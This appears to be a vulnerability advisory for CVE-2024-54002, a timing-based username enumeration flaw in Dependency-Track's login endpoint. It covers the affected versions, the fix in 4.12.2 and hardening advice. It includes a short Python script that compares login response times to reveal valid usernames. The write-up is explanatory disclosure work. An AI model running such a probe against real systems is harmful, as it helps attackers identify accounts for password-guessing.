CVE-2024-54002 - Dependency-Track User Enumeration Vulnerability in Login Process

Dependency-Track (https://dependencytrack.org) is an open-source Component Analysis platform designed to help organizations identify and reduce software supply chain risks. It integrates with other tools such as vulnerability scanners, provides comprehensive visibility of software components and their vulnerabilities, and helps in managing the risk posed by these components. However, a recent vulnerability (CVE-2024-54002) was discovered, enabling malicious actors to enumerate valid user accounts, making subsequent attacks like password-guessing or social engineering much easier. It is important to note that LDAP and OpenID Connect users are not affected by this vulnerability, and it has been fixed in Dependency-Track version 4.12.2.

Exploit Details

The vulnerability resides in the login process of Dependency-Track, specifically in the /api/v1/user/login endpoint. When an attacker attempts to perform a login request using a valid and known username in the system, the request takes significantly longer to process compared to when using a non-existent username. This observable difference in request duration can be used by malicious actors to enumerate valid names of managed users and subsequently launch further attacks.

Here is a code snippet that demonstrates the vulnerability

import requests
import time

base_url = "https://example.com/dependency-track/";
login_endpoint = "api/v1/user/login"

# Try logging in with a non-existent username
start_time = time.time()
response = requests.post(base_url + login_endpoint, json={"username": "nonexistent_user", "password": "random_password"})
end_time = time.time()

print("Non-existent user request duration:", end_time - start_time)

# Try logging in with an existing username
start_time = time.time()
response = requests.post(base_url + login_endpoint, json={"username": "existing_user", "password": "random_password"})
end_time = time.time()

print("Existing user request duration:", end_time - start_time)

In this example, the difference between the duration for nonexistent_user and existing_user requests is noticeable, indicating that the existing_user is a valid username in the Dependency-Track platform.

References to Original Sources

1. Dependency-Track Official Website: https://dependencytrack.org
2. Dependency-Track GitHub Repository: https://github.com/DependencyTrack/dependency-track
3. CVE-2024-54002: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54002
4. Dependency-Track 4.12.2 Release Notes: https://github.com/DependencyTrack/dependency-track/releases/tag/4.12.2

Mitigation

To protect against this vulnerability, it is essential to upgrade Dependency-Track to the latest version (4.12.2 or later). This version contains a fix for the CVE-2024-54002 vulnerability, ensuring that malicious actors can no longer enumerate valid usernames based on the observable difference in request duration on the /api/v1/user/login endpoint.

In addition to upgrading Dependency-Track, organizations should also follow best practices for securing the platform, such as using strong, unique passwords for all user accounts, enabling multi-factor authentication, and regular security reviews and audits. By ensuring a robust security posture, organizations can better protect their software supply chain from various threats and vulnerabilities.

Timeline

Published on: 12/04/2024 16:15:26 UTC